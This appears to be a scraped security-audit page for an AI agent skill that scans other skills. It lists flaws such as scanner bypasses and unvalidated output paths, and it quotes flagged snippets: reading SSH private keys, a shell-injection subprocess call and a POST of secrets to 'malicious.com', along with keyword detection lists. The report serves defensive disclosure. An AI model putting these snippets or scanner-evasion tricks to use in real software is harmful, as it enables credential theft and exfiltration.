T09 · Insecure Skill Coding Practices
- Location
scripts/audit.py:95- Finding
Name-Based Audit Bypass Produces False LOW-Risk Results
- Content
View full analysis
- Remediation
View remediation
Security audit
Security checks for vulnerabilities and agentic risk
This skill is a disclosed security-auditing tool, but its own scanner can skip or miss important skill content and may give users misleading low-risk results.
Install only if you treat this as a lightweight helper, not a source of truth. Its reports can miss malicious instructions or payloads and can falsely mark same-named skills as low risk; run it in a constrained workspace and verify important results with another review process.
scripts/audit.py:95Name-Based Audit Bypass Produces False LOW-Risk Results
scripts/audit.py:132Restricted File-Type Scanning Misses Skill Instructions and Unsupported Payloads
scripts/scan_skill.py:111Attacker-Controlled Filenames Suppress Unsafe Code Findings
Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.
# CRITICAL - Credential harvesting
with open(os.path.expanduser("~/.ssh/id_rsa")) as f:
key = f.read()
Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).
```python
# HIGH - Shell injection
subprocess.run(f"ls {directory}", shell=True)
# MEDIUM - Dynamic code
Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.
("password", "Password file access"),
("secret", "Secret file access"),
("credentials", "Credentials access"),
(".env", "Environment file access"),
],
"network": [
("eval(", "Dynamic code execution"),
Potential security issue detected. Manual review is recommended.
("exec(", "Shell execution"),
],
"permissions": [
("--privileged", "Privileged mode"),
("--cap-all", "All capabilities"),
("security=insecure", "Insecure security mode"),
("elevated=true", "Elevated permissions"),
The skill documentation instructs use of shell commands and indicates file read/write behavior via generated reports, but the manifest declares no explicit tool scope such as permissions or allowed-tools. This creates a mismatch between declared capabilities and actual expected behavior, which weakens least-privilege controls and can cause the skill to be run with broader or implicit access than reviewers anticipated.
Data is being sent to an external URL. This could be legitimate telemetry or data exfiltration. Manual review is recommended.
# HIGH - Suspicious outbound
requests.post("https://malicious.com", data=secrets)
The script explicitly exempts the security-auditor skill from auditing, which creates a blind spot in the very tool meant to assess installed skills. An attacker or careless maintainer could hide risky behavior in this skill and it would never be surfaced by normal scans, undermining trust in audit results.
Path(args.output).write_text(report) writes to any path supplied by the user without validation, confirmation, or safe-directory restrictions. In agent or automated contexts, a manipulated output path could overwrite arbitrary user files, clobber configuration, or place content in sensitive locations.
The manifest describes scanning and auditing skills for security risks, suspicious patterns, and permission overreach, but the code also exposes a separate --compare mode that compares two skills' risk results. That comparison feature is not reflected in the manifest description, so the implemented behavior exceeds the stated scope of the skill's purpose.
Detected: suspicious.dynamic_code_execution